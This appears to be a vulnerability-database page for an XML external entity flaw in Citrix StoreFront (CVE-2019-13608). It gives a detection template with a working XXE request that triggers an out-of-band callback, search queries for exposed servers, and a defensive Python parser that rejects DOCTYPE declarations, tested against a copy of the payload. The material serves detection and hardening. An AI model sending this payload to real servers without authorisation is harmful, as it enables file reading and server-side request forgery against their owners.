Citrix StoreFront Server - XML External Entity
CVE-2019-13608
Verified
Description: Citrix StoreFront Server before 1903, 7.15 LTSR before CU4 (3.12.4000), and 7.6 LTSR before CU8 (3.0.8000) allows XXE attacks.
Severity: High
CVSS Score: 7.5
Exploit Probability: 71%
Affected Product: storefront_server
Published Date: January 22, 2026
Template Author: daffainfo
CVE-2019-13608.yaml
id: CVE-2019-13608

info:
  name: Citrix StoreFront Server - XML External Entity
  author: daffainfo
  severity: high
  description: |
    Citrix StoreFront Server before 1903, 7.15 LTSR before CU4 (3.12.4000), and 7.6 LTSR before CU8 (3.0.8000) allows XXE attacks.
  impact: |
    Attackers can read arbitrary files, perform server-side request forgery, or cause denial of service through XXE attacks.
  remediation: |
    Update to version 1903 or later for StoreFront, CU4 or later for 7.15 LTSR, CU8 or later for 7.6 LTSR.
  reference:
    - https://www.exploit-db.com/exploits/47561
    - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX251988
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13608
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-13608
    cwe-id: CWE-611
    epss-score: 0.71255
    epss-percentile: 0.98734
    cpe: cpe:2.3:a:citrix:storefront_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: citrix
    product: storefront_server
    shodan-query: "/Citrix/StoreWeb"
    fofa-query: "/Citrix/StoreWeb"
  tags: cve,cve2019,citrix,storefront_server,xxe,kev,vkev

http:
  - raw:
      - |
        POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/vnd.citrix.requesttoken+xml
        Accept: application/vnd.citrix.requesttokenresponse+xml, text/xml, application/vnd.citrix.authenticateresponse-1+xml

        <?xml version="1.0" encoding="utf-8"?>
        <!DOCTYPE requesttoken [<!ENTITY % xxe SYSTEM "http://{{interactsh-url}}"> %xxe; ]>
        <requesttoken xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken">
          <for-service>6b78ab94-a709-4e3a-8b9b-a49ca317c70c</for-service>
          <for-service-url>https://www.example.com/Citrix/Store/resources/v2</for-service-url>
          <reqtokentemplate />
          <requested-lifetime>1.00:00:00</requested-lifetime>
        </requesttoken>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: content_type
        words:
          - "vnd.citrix.authenticateresponse"

      - type: word
        part: body
        words:
          - "<AuthenticateResponse"
          - "error-bad-request"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cbefe440140d3110983879b304c6a3aae272b6296e56247fdcc1454eb5346994022100b824fcae04995faa8e15f1fc58c9bb1a4bd5c64cddf53cc0d2e31f43271a02a4:922c64590222798bb761d5b6d8e72950
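The template detects the flaw by sending a requesttoken body whose DOCTYPE declares a parameter entity with an external SYSTEM identifier and then watching for the out-of-band HTTP callback. On the server side, the fix for CWE-611 is to parse the requesttoken document with DTD processing disabled. The Python example below is added here and is not part of the template or of Citrix's code; it uses only the standard-library expat parser, aborts on any DOCTYPE, entity declaration or external entity reference, and is exercised against a constructed benign requesttoken body (the same element shape as the one in the template) and a constructed copy of the template's payload in which a placeholder host stands in for the interactsh callback.

```python
"""Reject DOCTYPE/entity declarations before parsing a Citrix requesttoken body.

Added example (not from the template or from Citrix): a defensive parser that
refuses exactly the construct the template's payload relies on, using only the
Python standard library (xml.parsers.expat).
"""
from xml.parsers import expat


class DoctypeRejected(ValueError):
    """Raised when the document carries a DOCTYPE or entity declaration."""


def parse_without_dtd(xml_bytes: bytes) -> dict:
    """Parse xml_bytes and return {leaf element name: text}.

    Any DOCTYPE, entity declaration or external entity reference aborts
    parsing with DoctypeRejected, so no SYSTEM identifier is ever fetched.
    """
    parser = expat.ParserCreate()
    # Never read or expand parameter entities (the "%xxe;" reference in the payload).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {doctype_name!r} is not allowed")

    def reject_entity(*_decl):
        raise DoctypeRejected("entity declarations are not allowed")

    def reject_external(*_ref):
        raise DoctypeRejected("external entity references are not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external

    leaves: dict = {}
    text: list = []

    def start_element(name, _attrs):
        text.clear()  # whitespace before a child element is not leaf text

    def character_data(data):
        text.append(data)

    def end_element(name):
        value = "".join(text).strip()
        if value:
            leaves[name] = value  # only elements with their own text become leaves
        text.clear()

    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = character_data
    parser.EndElementHandler = end_element

    parser.Parse(xml_bytes, True)  # exceptions raised in handlers propagate from here
    return leaves


def classify(xml_bytes: bytes) -> str:
    """Return 'ok', 'doctype-rejected' or 'malformed' for an incoming body."""
    try:
        parse_without_dtd(xml_bytes)
    except DoctypeRejected:
        return "doctype-rejected"
    except expat.ExpatError:
        return "malformed"
    return "ok"


# Constructed sample: a well-formed requesttoken with no DOCTYPE.
BENIGN_REQUEST = b"""<?xml version="1.0" encoding="utf-8"?>
<requesttoken xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken">
  <for-service>6b78ab94-a709-4e3a-8b9b-a49ca317c70c</for-service>
  <for-service-url>https://www.example.com/Citrix/Store/resources/v2</for-service-url>
  <reqtokentemplate />
  <requested-lifetime>1.00:00:00</requested-lifetime>
</requesttoken>
"""

# Constructed sample: the template's payload shape, with a placeholder callback host.
XXE_REQUEST = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE requesttoken [<!ENTITY % xxe SYSTEM "http://callback.example.invalid/"> %xxe; ]>
<requesttoken xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken">
  <for-service>6b78ab94-a709-4e3a-8b9b-a49ca317c70c</for-service>
</requesttoken>
"""

if __name__ == "__main__":
    print(classify(BENIGN_REQUEST), parse_without_dtd(BENIGN_REQUEST))
    print(classify(XXE_REQUEST))
```

The DOCTYPE handler fires before expat reads the internal subset, so the parameter entity is never declared, let alone resolved; the entity and external-reference handlers are belt-and-braces for documents that reach a DTD through another path. Libraries such as defusedxml apply the same policy across the whole xml package; the point here is that rejecting the declaration up front is cheap and needs no allow-list of element names.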